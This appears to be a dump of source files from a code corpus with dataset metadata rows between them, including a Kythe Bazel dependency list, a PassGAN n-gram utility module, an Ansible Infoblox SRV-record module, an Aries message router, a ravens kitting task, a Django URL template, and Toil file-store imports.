importpath = "cloud.google.com/go/storage",
sum = "h1:UDpwYIwla4jHGzZJaEJYx1tOejbgSoNqsAfHAUYe2r8=",
version = "v1.6.0",
)
go_repository(
name = "com_shuralyov_dmitri_gpu_mtl",
importpath = "dmitri.shuralyov.com/gpu/mtl",
sum = "h1:VpgP7xuJadIUuKccphEpTJnWhS2jkQyMt6Y7pJCD7fY=",
version = "v0.0.0-20190408044501-666a987793e9",
)
go_repository(
name = "in_gopkg_check_v1",
importpath = "gopkg.in/check.v1",
sum = "h1:YR8cESwS4TdDjEe65xsg0ogRM/Nc3DYOhEAlW+xobZo=",
version = "v1.0.0-20190902080502-41f04d3bba15",
)
go_repository(
name = "in_gopkg_errgo_v2",
importpath = "gopkg.in/errgo.v2",
sum = "h1:0vLT13EuvQ0hNvakwLuFZ/jYrLp5F3kcWHXdRggjCE8=",
version = "v2.1.0",
)
go_repository(
name = "in_gopkg_fsnotify_v1",
importpath = "gopkg.in/fsnotify.v1",
sum = "h1:xOHLXZwVvI9hhs+cLKq5+I5onOuwQLhQwiu63xxlHs4=",
version = "v1.4.7",
)
go_repository(
name = "in_gopkg_tomb_v1",
importpath = "gopkg.in/tomb.v1",
sum = "h1:uRGJdciOHaEIrze2W8Q3AKkepLTh2hOroT7a+7czfdQ=",
version = "v1.0.0-20141024135613-dd632973f1e7",
)
go_repository(
name = "io_rsc_binaryregexp",
importpath = "rsc.io/binaryregexp",
sum = "h1:HfqmD5MEmC0zvwBuF187nq9mdnXjXsSivRiXN7SmRkE=",
version = "v0.2.0",
)
go_repository(
name = "org_golang_google_appengine",
importpath = "google.golang.org/appengine",
sum = "h1:tycE03LOZYQNhDpS27tcQdAzLCVMaj7QT2SXxebnpCM=",
version = "v1.6.5",
)
go_repository(
name = "org_golang_google_genproto",
importpath = "google.golang.org/genproto",
sum = "h1:pyQjO6BnPvrPMldYxgDlXq9PLahtc0EKnUTYX1pWwXU=",
version = "v0.0.0-20200313141609-30c55424f95d",
)
go_repository(
name = "org_golang_x_crypto",
importpath = "golang.org/x/crypto",
sum = "h1:ObdrDkeb4kJdCP557AjRjq69pTHfNouLtWZG7j9rPN8=",
version = "v0.0.0-20191011191535-87dc89f01550",
)
go_repository(
name = "org_golang_x_exp",
importpath = "golang.org/x/exp",
sum = "h1:QE6XYQK6naiK1EPAe1g/ILLxN5RBoH5xkJk3CqlMI/Y=",
version = "v0.0.0-20200224162631-6cc2880d07d6",
)
go_repository(
name = "org_golang_x_image",
importpath = "golang.org/x/image",
sum = "h1:+qEpEAPhDZ1o0x3tHzZTQDArnOixOzGD9HUJfcg0mb4=",
version = "v0.0.0-20190802002840-cff245a6509b",
)
go_repository(
name = "org_golang_x_lint",
importpath = "golang.org/x/lint",
sum = "h1:Wh+f8QHJXR411sJR8/vRBTZ7YapZaRvUcLFFJhusH0k=",
version = "v0.0.0-20200302205851-738671d3881b",
)
go_repository(
name = "org_golang_x_mobile",
importpath = "golang.org/x/mobile",
sum = "h1:4+4C/Iv2U4fMZBiMCc98MG1In4gJY5YRhtpDNeDeHWs=",
version = "v0.0.0-20190719004257-d2bd2a29d028",
)
go_repository(
name = "org_golang_x_mod",
importpath = "golang.org/x/mod",
sum = "h1:KU7oHjnv3XNWfa5COkzUifxZmxp1TyI7ImMXqFxLwvQ=",
version = "v0.2.0",
)
go_repository(
name = "org_golang_x_time",
importpath = "golang.org/x/time",
sum = "h1:/5xXl8Y5W96D+TtHSlonuFqGHIWVuyCkGJLwGh9JJFs=",
version = "v0.0.0-20191024005414-555d28b269f0",
)
go_repository(
name = "org_golang_x_xerrors",
importpath = "golang.org/x/xerrors",
sum = "h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4=",
version = "v0.0.0-20191204190536-9bdfabe68543",
)
go_repository(
name = "com_github_frankban_quicktest",
importpath = "github.com/frankban/quicktest",
sum = "h1:2QxQoC1TS09S7fhCPsrvqYdvP1H5M1P1ih5ABm3BTYk=",
version = "v1.7.2",
)
def _rust_dependencies():
fetch_example_hello_world_remote_crates()
fetch_extractor_remote_crates()
fetch_indexer_remote_crates()
def _bindings():
maybe(
native.bind,
name = "vnames_config",
actual = "@io_kythe//kythe/data:vnames_config",
)
maybe(
native.bind,
name = "libuuid",
actual = "@io_kythe//third_party:libuuid",
)
maybe(
native.bind,
name = "libmemcached",
actual = "@org_libmemcached_libmemcached//:libmemcached",
)
maybe(
native.bind,
name = "guava", # required by @com_google_protobuf
actual = "@io_kythe//third_party/guava",
)
maybe(
native.bind,
name = "gson", # required by @com_google_protobuf
actual = "@maven//:com_google_code_gson_gson",
)
maybe(
native.bind,
name = "zlib", # required by @com_google_protobuf
actual = "@net_zlib//:zlib",
)
def _extractor_image_dependencies():
"""Defines external repositories necessary for extractor images."""
go_repository(
name = "com_github_bazelbuild_bazelisk",
importpath = "github.com/bazelbuild/bazelisk",
tag = "v1.3.0",
)
go_repository(
name = "com_github_mitchellh_go_homedir",
importpath = "github.com/mitchellh/go-homedir",
tag = "v1.1.0",
)
go_repository(
name = "com_github_hashicorp_go_version",
importpath = "github.com/hashicorp/go-version",
tag = "v1.1.0",
)
def _sample_ui_dependencies():
"""Defines external repositories necessary for building the sample UI."""
lein_repository(
name = "org_leiningen",
sha256 = "a0a1f093677045c4e1e40219ccc989acd61433f61c50e098a2185faf4f03553c",
version = "2.5.3",
)
def kythe_dependencies(sample_ui = True):
"""Defines external repositories for Kythe dependencies.
Call this once in your WORKSPACE file to load all @io_kythe dependencies.
"""
_proto_dependencies()
_cc_dependencies()
_go_dependencies()
_java_dependencies()
_rust_dependencies()
# proto_library, cc_proto_library, and java_proto_library rules implicitly
# depend on @com_google_protobuf for protoc and proto runtimes.
maybe(
http_archive,
name = "com_google_protobuf",
sha256 = "2ba20d91341ef88259896a5dfaf55666d11648caa0964342991e30a96b7cd630",
strip_prefix = "protobuf-3.10.0-rc1",
urls = [
"https://mirror.bazel.build/github.com/protocolbuffers/protobuf/archive/v3.10.0-rc1.zip",
"https://github.com/protocolbuffers/protobuf/archive/v3.10.0-rc1.zip",
],
repo_mapping = {"@zlib": "@net_zlib"},
)
maybe(
http_archive,
name = "io_kythe_llvmbzlgen",
sha256 = "6d077cfe818d08ea9184d71f73581135b69c379692771afd88392fa1fee018ac",
urls = [
"https://mirror.bazel.build/github.com/kythe/llvmbzlgen/archive/435bad1d07f7a8d32979d66cd5547e1b32dca812.zip",
"https://github.com/kythe/llvmbzlgen/archive/435bad1d07f7a8d32979d66cd5547e1b32dca812.zip",
],
strip_prefix = "llvmbzlgen-435bad1d07f7a8d32979d66cd5547e1b32dca812",
)
_bindings()
_rule_dependencies()
if sample_ui:
_sample_ui_dependencies()
_extractor_image_dependencies()
| 35.901993
| 128
| 0.627562
|
4a15c9ef8bbe1406602bf5d332882026c818850d
| 4,371
|
py
|
Python
|
utils.py
|
rsj123/PassGAN
|
02f18a7b83c0ca8deb76c7c2cfacc5aeb99e7999
|
[
"MIT"
] | 1
|
2021-03-22T07:58:15.000Z
|
2021-03-22T07:58:15.000Z
|
utils.py
|
rsj123/PassGAN
|
02f18a7b83c0ca8deb76c7c2cfacc5aeb99e7999
|
[
"MIT"
] | 1
|
2020-03-10T00:09:12.000Z
|
2020-03-10T00:09:12.000Z
|
utils.py
|
rsj123/PassGAN
|
02f18a7b83c0ca8deb76c7c2cfacc5aeb99e7999
|
[
"MIT"
] | 1
|
2020-03-09T08:07:41.000Z
|
2020-03-09T08:07:41.000Z
|
import collections
import numpy as np
import re
def tokenize_string(sample):
return tuple(sample.lower().split(' '))
class NgramLanguageModel(object):
def __init__(self, n, samples, tokenize=False):
if tokenize:
tokenized_samples = []
for sample in samples:
tokenized_samples.append(tokenize_string(sample))
samples = tokenized_samples
self._n = n
self._samples = samples
self._ngram_counts = collections.defaultdict(int)
self._total_ngrams = 0
for ngram in self.ngrams():
self._ngram_counts[ngram] += 1
self._total_ngrams += 1
def ngrams(self):
n = self._n
for sample in self._samples:
for i in range(len(sample)-n+1):
yield sample[i:i+n]
def unique_ngrams(self):
return set(self._ngram_counts.keys())
def log_likelihood(self, ngram):
if ngram not in self._ngram_counts:
return -np.inf
else:
return np.log(self._ngram_counts[ngram]) - np.log(self._total_ngrams)
def kl_to(self, p):
# p is another NgramLanguageModel
log_likelihood_ratios = []
for ngram in p.ngrams():
log_likelihood_ratios.append(p.log_likelihood(ngram) - self.log_likelihood(ngram))
return np.mean(log_likelihood_ratios)
def cosine_sim_with(self, p):
# p is another NgramLanguageModel
p_dot_q = 0.
p_norm = 0.
q_norm = 0.
for ngram in p.unique_ngrams():
p_i = np.exp(p.log_likelihood(ngram))
q_i = np.exp(self.log_likelihood(ngram))
p_dot_q += p_i * q_i
p_norm += p_i**2
for ngram in self.unique_ngrams():
q_i = np.exp(self.log_likelihood(ngram))
q_norm += q_i**2
return p_dot_q / (np.sqrt(p_norm) * np.sqrt(q_norm))
def precision_wrt(self, p):
# p is another NgramLanguageModel
num = 0.
denom = 0
p_ngrams = p.unique_ngrams()
for ngram in self.unique_ngrams():
if ngram in p_ngrams:
num += self._ngram_counts[ngram]
denom += self._ngram_counts[ngram]
return float(num) / denom
def recall_wrt(self, p):
return p.precision_wrt(self)
def js_with(self, p):
log_p = np.array([p.log_likelihood(ngram) for ngram in p.unique_ngrams()])
log_q = np.array([self.log_likelihood(ngram) for ngram in p.unique_ngrams()])
log_m = np.logaddexp(log_p - np.log(2), log_q - np.log(2))
kl_p_m = np.sum(np.exp(log_p) * (log_p - log_m))
log_p = np.array([p.log_likelihood(ngram) for ngram in self.unique_ngrams()])
log_q = np.array([self.log_likelihood(ngram) for ngram in self.unique_ngrams()])
log_m = np.logaddexp(log_p - np.log(2), log_q - np.log(2))
kl_q_m = np.sum(np.exp(log_q) * (log_q - log_m))
return 0.5*(kl_p_m + kl_q_m) / np.log(2)
def load_dataset(path, max_length, tokenize=False, max_vocab_size=2048):
lines = []
with open(path, 'r') as f:
for line in f:
line = line[:-1]
if tokenize:
line = tokenize_string(line)
else:
line = tuple(line)
if len(line) > max_length:
line = line[:max_length]
continue # don't include this sample, its too long
# right pad with ` character
lines.append(line + ( ("`",)*(max_length-len(line)) ) )
np.random.shuffle(lines)
import collections
counts = collections.Counter(char for line in lines for char in line)
charmap = {'unk':0}
inv_charmap = ['unk']
for char,count in counts.most_common(max_vocab_size-1):
if char not in charmap:
charmap[char] = len(inv_charmap)
inv_charmap.append(char)
filtered_lines = []
for line in lines:
filtered_line = []
for char in line:
if char in charmap:
filtered_line.append(char)
else:
filtered_line.append('unk')
filtered_lines.append(tuple(filtered_line))
# for i in xrange(100):
# print filtered_lines[i]
print("loaded {} lines in dataset".format(len(lines)))
return filtered_lines, charmap, inv_charmap
| 32.377778
| 94
| 0.586365
|
4a15caf21f502e3d03a090722faaab48b2c92faf
| 4,604
|
py
|
Python
|
Collections-a-installer/community-general-2.4.0/plugins/modules/nios_srv_record.py
|
d-amien-b/simple-getwordpress
|
da90d515a0aa837b633d50db4d91d22b031c04a2
|
[
"MIT"
] | 5
|
2020-12-16T21:42:09.000Z
|
2022-03-28T16:04:32.000Z
|
Collections-a-installer/community-general-2.4.0/plugins/modules/nios_srv_record.py
|
d-amien-b/simple-getwordpress
|
da90d515a0aa837b633d50db4d91d22b031c04a2
|
[
"MIT"
] | null | null | null |
Collections-a-installer/community-general-2.4.0/plugins/modules/nios_srv_record.py
|
d-amien-b/simple-getwordpress
|
da90d515a0aa837b633d50db4d91d22b031c04a2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2018 Red Hat, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: nios_srv_record
author: "Blair Rampling (@brampling)"
short_description: Configure Infoblox NIOS SRV records
description:
- Adds and/or removes instances of SRV record objects from
Infoblox NIOS servers. This module manages NIOS C(record:srv) objects
using the Infoblox WAPI interface over REST.
requirements:
- infoblox-client
extends_documentation_fragment:
- community.general.nios
options:
name:
description:
- Specifies the fully qualified hostname to add or remove from
the system
required: true
view:
description:
- Sets the DNS view to associate this a record with. The DNS
view must already be configured on the system
default: default
aliases:
- dns_view
port:
description:
- Configures the port (0-65535) of this SRV record.
priority:
description:
- Configures the priority (0-65535) for this SRV record.
target:
description:
- Configures the target FQDN for this SRV record.
weight:
description:
- Configures the weight (0-65535) for this SRV record.
ttl:
description:
- Configures the TTL to be associated with this host record
extattrs:
description:
- Allows for the configuration of Extensible Attributes on the
instance of the object. This argument accepts a set of key / value
pairs for configuration.
comment:
description:
- Configures a text string comment to be associated with the instance
of this object. The provided text string will be configured on the
object instance.
state:
description:
- Configures the intended state of the instance of the object on
the NIOS server. When this value is set to C(present), the object
is configured on the device and when this value is set to C(absent)
the value is removed (if necessary) from the device.
default: present
choices:
- present
- absent
'''
EXAMPLES = '''
- name: Configure an SRV record
community.general.nios_srv_record:
name: _sip._tcp.service.ansible.com
port: 5080
priority: 10
target: service1.ansible.com
weight: 10
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: Add a comment to an existing SRV record
community.general.nios_srv_record:
name: _sip._tcp.service.ansible.com
port: 5080
priority: 10
target: service1.ansible.com
weight: 10
comment: this is a test comment
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: Remove an SRV record from the system
community.general.nios_srv_record:
name: _sip._tcp.service.ansible.com
port: 5080
priority: 10
target: service1.ansible.com
weight: 10
state: absent
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
from ansible_collections.community.general.plugins.module_utils.net_tools.nios.api import WapiModule
from ansible_collections.community.general.plugins.module_utils.net_tools.nios.api import NIOS_SRV_RECORD
def main():
''' Main entry point for module execution
'''
ib_spec = dict(
name=dict(required=True, ib_req=True),
view=dict(default='default', aliases=['dns_view'], ib_req=True),
port=dict(type='int', ib_req=True),
priority=dict(type='int', ib_req=True),
target=dict(ib_req=True),
weight=dict(type='int', ib_req=True),
ttl=dict(type='int'),
extattrs=dict(type='dict'),
comment=dict(),
)
argument_spec = dict(
provider=dict(required=True),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(ib_spec)
argument_spec.update(WapiModule.provider_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
wapi = WapiModule(module)
result = wapi.run(NIOS_SRV_RECORD, ib_spec)
module.exit_json(**result)
if __name__ == '__main__':
main()
| 28.245399
| 105
| 0.685056
|
4a15cc06745d0808d634d30f811ea58cc8004552
| 7,993
|
py
|
Python
|
aries_staticagent/module.py
|
hyperledger/aries-staticagent-python
|
6aa317a5330d64f610ee9cccb3d02211659b8a64
|
[
"Apache-2.0"
] | 18
|
2019-06-20T18:19:36.000Z
|
2022-01-17T04:30:18.000Z
|
aries_staticagent/module.py
|
hyperledger/aries-staticagent-python
|
6aa317a5330d64f610ee9cccb3d02211659b8a64
|
[
"Apache-2.0"
] | 16
|
2019-06-20T18:24:49.000Z
|
2021-05-19T17:38:40.000Z
|
aries_staticagent/module.py
|
hyperledger/aries-staticagent-python
|
6aa317a5330d64f610ee9cccb3d02211659b8a64
|
[
"Apache-2.0"
] | 20
|
2019-06-20T16:54:13.000Z
|
2021-12-03T00:08:37.000Z
|
""" Module base class """
from abc import ABC
from functools import partial
from typing import (
Callable,
ClassVar,
Dict,
Iterable,
Mapping,
TypeVar,
Union,
overload,
)
from .message import MsgType, ProtocolIdentifier
RouteFunc = TypeVar("RouteFunc", bound=Callable)
class ModuleRouter(Mapping[MsgType, Callable]):
"""Collect module routes."""
def __init__(
self,
protocol: Union[str, ProtocolIdentifier],
):
if not isinstance(protocol, ProtocolIdentifier):
protocol = ProtocolIdentifier(protocol)
self.protocol = protocol
self._routes: Dict[Union[str, MsgType], Callable] = {}
def __getitem__(self, item: Union[str, MsgType]) -> Callable:
return self._routes[item]
def __iter__(self) -> Iterable:
return iter(self._routes)
def __len__(self):
return len(self._routes)
def _route(
self,
func: RouteFunc,
*,
doc_uri: str = None,
protocol: str = None,
version: str = None,
name: str = None,
msg_type: Union[str, MsgType] = None
) -> RouteFunc:
"""Collect route."""
if msg_type:
if isinstance(msg_type, str):
msg_type = MsgType(msg_type)
type_to_route = msg_type
else:
type_to_route = MsgType.unparse(
doc_uri=doc_uri or self.protocol.doc_uri or "",
protocol=protocol or self.protocol.protocol or "",
version=version or self.protocol.version or "",
name=name or func.__name__ or "",
)
self._routes[type_to_route] = func
return func
@overload
def route(
self,
func_or_name: RouteFunc,
) -> RouteFunc:
"""Decorator for defining routes within a module.
>>> router = ModuleRouter("doc/protocol/1.0")
>>> @router
... def test():
... pass
>>> assert "doc/protocol/1.0/test" in router
>>> assert router["doc/protocol/1.0/test"] == test
"""
...
@overload
def route(
self,
func_or_name: str,
) -> Callable[..., RouteFunc]:
"""Decorator for defining routes within a module.
>>> router = ModuleRouter("doc/protocol/1.0")
>>> @router("alt-name")
... def test1():
... pass
>>> assert "doc/protocol/1.0/alt-name" in router
>>> assert router["doc/protocol/1.0/alt-name"] == test1
"""
...
@overload
def route(
self,
*,
doc_uri: str = None,
protocol: str = None,
version: str = None,
name: str = None,
msg_type: Union[str, MsgType] = None
) -> Callable[..., RouteFunc]:
"""Decorator for defining routes within a module.
>>> router = ModuleRouter("doc/protocol/1.0")
>>> @router(msg_type="another-doc/some-protocol/2.0/name")
... def test2():
... pass
>>> assert "another-doc/some-protocol/2.0/name" in router
>>> assert router["another-doc/some-protocol/2.0/name"] == test2
>>>
>>> @router(doc_uri="another-doc/")
... def test3():
... pass
>>> assert "another-doc/protocol/1.0/test3" in router
>>> assert router["another-doc/protocol/1.0/test3"] == test3
>>> @router(protocol="some-protocol")
... def test4():
... pass
>>> assert "doc/some-protocol/1.0/test4" in router
>>> assert router["doc/some-protocol/1.0/test4"] == test4
>>>
>>> @router(version="2.0")
... def test5():
... pass
>>> assert "doc/protocol/2.0/test5" in router
>>> assert router["doc/protocol/2.0/test5"] == test5
>>>
>>> @router(name="another-alt-name")
... def test6():
... pass
>>> assert "doc/protocol/1.0/another-alt-name" in router
>>> assert router["doc/protocol/1.0/another-alt-name"] == test6
"""
...
@overload
def route(
self,
func_or_name: RouteFunc,
*,
doc_uri: str = None,
protocol: str = None,
version: str = None,
name: str = None,
msg_type: Union[str, MsgType] = None
) -> RouteFunc:
"""Decorator for defining routes within a module."""
...
def route(
self,
func_or_name: Union[RouteFunc, str] = None,
*,
doc_uri: str = None,
protocol: str = None,
version: str = None,
name: str = None,
msg_type: Union[str, MsgType] = None
) -> Union[Callable[..., RouteFunc], RouteFunc]:
"""Decorator for defining routes within a module."""
# Empty @route() case
if not func_or_name:
return lambda f: self.route(
f,
doc_uri=doc_uri,
protocol=protocol,
version=version,
name=name,
msg_type=msg_type,
)
# @route("msg_name") case
if isinstance(func_or_name, str):
name = func_or_name
return lambda f: self.route(
f,
doc_uri=doc_uri,
protocol=protocol,
version=version,
name=name,
msg_type=msg_type,
)
# After the previous checks, the first positional argument must now be
# the method to decorate.
if not callable(func_or_name):
raise TypeError("func is not a callable")
return self._route(
func_or_name,
doc_uri=doc_uri,
protocol=protocol,
version=version,
name=name,
msg_type=msg_type,
)
def __call__(self, *args, **kwargs):
return self.route(*args, **kwargs)
def contextualize(self, context: object) -> Dict[MsgType, Callable]:
"""Return routes with handlers wrapped as partials to include 'self'."""
return {
msg_type: partial(handler, context) for msg_type, handler in self.items()
}
class Module(ABC): # pylint: disable=too-few-public-methods
"""Base Module class."""
protocol: ClassVar[str]
route: ClassVar[ModuleRouter]
def __init__(self):
self._routes = None
self._protocol_identifier = ProtocolIdentifier(self.protocol)
@property
def protocol_identifier(self) -> ProtocolIdentifier:
"""Parsed protocol identifier."""
return self._protocol_identifier
@property
def router(self) -> ModuleRouter:
"""Alias to route."""
return self.route
@property
def doc_uri(self) -> str:
"""Protocol doc URI."""
return self.protocol_identifier.doc_uri
@property
def protocol_name(self) -> str:
"""Protocol name."""
return self.protocol_identifier.protocol
@property
def version(self) -> str:
"""Protocol version."""
return self.protocol_identifier.version
def type(
self, name: str, doc_uri: str = None, protocol: str = None, version: str = None
):
"""Build a type string for this module."""
# doc_url can be falsey, need explicit none check
doc_uri = doc_uri if doc_uri is not None else self.doc_uri
protocol = protocol or self.protocol_name
version = version or self.version
return MsgType.unparse(doc_uri, protocol, version, name)
def _contextualize_routes(self) -> Mapping[MsgType, Callable]:
return self.router.contextualize(context=self)
@property
def routes(self) -> Mapping[MsgType, Callable]:
"""Get the routes statically defined for this module and
save in instance.
"""
if self._routes is None:
self._routes = self._contextualize_routes()
return self._routes
| 29.171533
| 87
| 0.552734
|
4a15cc1173dd59a379151eb3aa0b1ce47089da1f
| 4,604
|
py
|
Python
|
ravens/tasks/assembling_kits.py
|
OolongQian/ravens
|
5774494de040ab0e8b3a0a93772f55916fbf0e53
|
[
"Apache-2.0"
] | 1
|
2021-09-15T16:27:05.000Z
|
2021-09-15T16:27:05.000Z
|
ravens/tasks/assembling_kits.py
|
roboticslab-uc3m/ravens
|
1e68b1c53610ea5370e0f5fc8c31182842090726
|
[
"Apache-2.0"
] | null | null | null |
ravens/tasks/assembling_kits.py
|
roboticslab-uc3m/ravens
|
1e68b1c53610ea5370e0f5fc8c31182842090726
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2021 The Ravens Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Kitting Tasks."""
import os
import numpy as np
from ravens.tasks.task import Task
from ravens.utils import utils
class AssemblingKits(Task):
"""Kitting Tasks base class."""
def __init__(self):
super().__init__()
# self.ee = 'suction'
self.max_steps = 10
# self.metric = 'pose'
# self.primitive = 'pick_place'
self.train_set = np.arange(0, 14)
self.test_set = np.arange(14, 20)
self.homogeneous = False
def reset(self, env):
super().reset(env)
# Add kit.
kit_size = (0.28, 0.2, 0.005)
kit_urdf = 'kitting/kit.urdf'
kit_pose = self.get_random_pose(env, kit_size)
env.add_object(kit_urdf, kit_pose, 'fixed')
n_objects = 5
if self.mode == 'train':
obj_shapes = np.random.choice(self.train_set, n_objects)
else:
if self.homogeneous:
obj_shapes = [np.random.choice(self.test_set)] * n_objects
else:
obj_shapes = np.random.choice(self.test_set, n_objects)
colors = [
utils.COLORS['purple'], utils.COLORS['blue'], utils.COLORS['green'],
utils.COLORS['yellow'], utils.COLORS['red']
]
symmetry = [
2 * np.pi, 2 * np.pi, 2 * np.pi / 3, np.pi / 2, np.pi / 2, 2 * np.pi,
np.pi, 2 * np.pi / 5, np.pi, np.pi / 2, 2 * np.pi / 5, 0, 2 * np.pi,
2 * np.pi, 2 * np.pi, 2 * np.pi, 0, 2 * np.pi / 6, 2 * np.pi, 2 * np.pi
]
# Build kit.
targets = []
targ_pos = [[-0.09, 0.045, 0.0014], [0, 0.045, 0.0014],
[0.09, 0.045, 0.0014], [-0.045, -0.045, 0.0014],
[0.045, -0.045, 0.0014]]
template = 'kitting/object-template.urdf'
for i in range(n_objects):
shape = os.path.join(self.assets_root, 'kitting',
f'{obj_shapes[i]:02d}.obj')
scale = [0.003, 0.003, 0.0001] # .0005
pos = utils.apply(kit_pose, targ_pos[i])
theta = np.random.rand() * 2 * np.pi
rot = utils.eulerXYZ_to_quatXYZW((0, 0, theta))
replace = {'FNAME': (shape,), 'SCALE': scale, 'COLOR': (0.2, 0.2, 0.2)}
urdf = self.fill_template(template, replace)
env.add_object(urdf, (pos, rot), 'fixed')
os.remove(urdf)
targets.append((pos, rot))
# Add objects.
objects = []
matches = []
# objects, syms, matcheses = [], [], []
for i in range(n_objects):
shape = obj_shapes[i]
size = (0.08, 0.08, 0.02)
pose = self.get_random_pose(env, size)
fname = f'{shape:02d}.obj'
fname = os.path.join(self.assets_root, 'kitting', fname)
scale = [0.003, 0.003, 0.001] # .0005
replace = {'FNAME': (fname,), 'SCALE': scale, 'COLOR': colors[i]}
urdf = self.fill_template(template, replace)
block_id = env.add_object(urdf, pose)
os.remove(urdf)
objects.append((block_id, (symmetry[shape], None)))
# objects[block_id] = symmetry[shape]
match = np.zeros(len(targets))
match[np.argwhere(obj_shapes == shape).reshape(-1)] = 1
matches.append(match)
# print(targets)
# exit()
# matches.append(list(np.argwhere(obj_shapes == shape).reshape(-1)))
matches = np.int32(matches)
# print(matcheses)
# exit()
# Add goal.
# self.goals.append((objects, syms, targets, 'matches', 'pose', 1.))
# Goal: objects are placed in their respective kit locations.
# print(objects)
# print(matches)
# print(targets)
# exit()
self.goals.append((objects, matches, targets, False, True, 'pose', None, 1))
# goal = Goal(objects, syms, targets)
# metric = Metric('pose-matches', None, 1.)
# self.goals.append((goal, metric))
# # Goal: box is aligned with corner (1 of 4 possible poses).
class AssemblingKitsEasy(AssemblingKits):
"""Kitting Task - Easy variant."""
def __init__(self):
super().__init__()
self.rot_eps = np.deg2rad(30)
self.train_set = np.int32(
[0, 1, 2, 4, 5, 6, 7, 8, 9, 10, 12, 13, 14, 15, 16, 17, 18, 19])
self.test_set = np.int32([3, 11])
self.homogeneous = True
| 33.122302
| 80
| 0.604692
|
4a15cc70456ad55394b0c86cbde3c38e8b5b7096
| 1,106
|
py
|
Python
|
project/api/models/tag.py
|
hlystovea/BBBS
|
7164ef67615e45d750e965bf958af229b56d49e3
|
[
"BSD-3-Clause"
] | null | null | null |
project/api/models/tag.py
|
hlystovea/BBBS
|
7164ef67615e45d750e965bf958af229b56d49e3
|
[
"BSD-3-Clause"
] | 2
|
2021-06-07T14:06:05.000Z
|
2021-06-18T16:27:29.000Z
|
project/api/models/tag.py
|
hlystovea/BBBS
|
7164ef67615e45d750e965bf958af229b56d49e3
|
[
"BSD-3-Clause"
] | 2
|
2021-07-27T20:40:18.000Z
|
2021-09-12T16:48:19.000Z
|
from django.db import models
from django.utils.translation import gettext_lazy as _
class Tag(models.Model):
name = models.CharField(
verbose_name=_('Название'),
max_length=50,
)
category = models.CharField(
verbose_name=_('Категория'),
max_length=50,
choices=(
('Фильмы', _('Фильмы')),
('Куда пойти', _('Куда пойти')),
('Вопросы', _('Вопросы')),
('Права', _('Права')),
('Видеоролики', _('Видеоролики')),
('Календарь', _('Календарь')),
),
)
slug = models.SlugField(
verbose_name=_('Слаг (Ссылка)'),
unique=True,
)
order = models.PositiveSmallIntegerField(
verbose_name=_('Порядок вывода'),
default=0,
help_text=_(
'Теги с меньшим значением выводятся первыми.'
),
)
class Meta:
app_label = 'api'
ordering = ('category', 'order')
verbose_name = _('Тег')
verbose_name_plural = _('Теги')
def __str__(self):
return f'{self.category}: {self.name}'
| 26.333333
| 57
| 0.540687
|
4a15cc8598f69ca28f909a899fc26ef2fbb5d18a
| 688
|
py
|
Python
|
templates/django/{project.name}/urls.py
|
BryanRiel/pyre
|
179359634a7091979cced427b6133dd0ec4726ea
|
[
"BSD-3-Clause"
] | 3
|
2019-08-02T21:02:47.000Z
|
2021-09-08T13:59:43.000Z
|
templates/django/{project.name}/urls.py
|
BryanRiel/pyre
|
179359634a7091979cced427b6133dd0ec4726ea
|
[
"BSD-3-Clause"
] | 1
|
2021-06-10T23:42:13.000Z
|
2021-06-10T23:42:13.000Z
|
templates/django/{project.name}/urls.py
|
BryanRiel/pyre
|
179359634a7091979cced427b6133dd0ec4726ea
|
[
"BSD-3-Clause"
] | 2
|
2020-08-31T18:07:52.000Z
|
2021-12-10T08:54:39.000Z
|
# -*- Python -*-
# -*- coding: utf-8 -*-
#
# {project.authors}
# {project.affiliations}
# (c) {project.span} all rights reserved
#
# this file describes the primary url router for {project.name}
# django imports
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf.urls.static import static
from django.conf import settings
# import the {project.name} applications
from . import base
# define the primary url patterns
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'', include(base.urls)),
# add the static urls
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
# end of file
| 24.571429
| 67
| 0.72093
|
4a15ccf09834ff7e41d165c5c2cee0f34deb48f9
| 11,773
|
py
|
Python
|
src/toil/fileStores/nonCachingFileStore.py
|
altairwei/toil
|
a11ae486971a51618da9abbc6cb46ef1e9f17874
|
[
"Apache-2.0"
] | null | null | null |
src/toil/fileStores/nonCachingFileStore.py
|
altairwei/toil
|
a11ae486971a51618da9abbc6cb46ef1e9f17874
|
[
"Apache-2.0"
] | null | null | null |
src/toil/fileStores/nonCachingFileStore.py
|
altairwei/toil
|
a11ae486971a51618da9abbc6cb46ef1e9f17874
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import str
from collections import defaultdict
from contextlib import contextmanager
import dill
import errno
import fcntl
import logging
import os
import sys
import uuid
from toil.lib.misc import robust_rmtree
from toil.lib.threading import get_process_name, process_name_exists
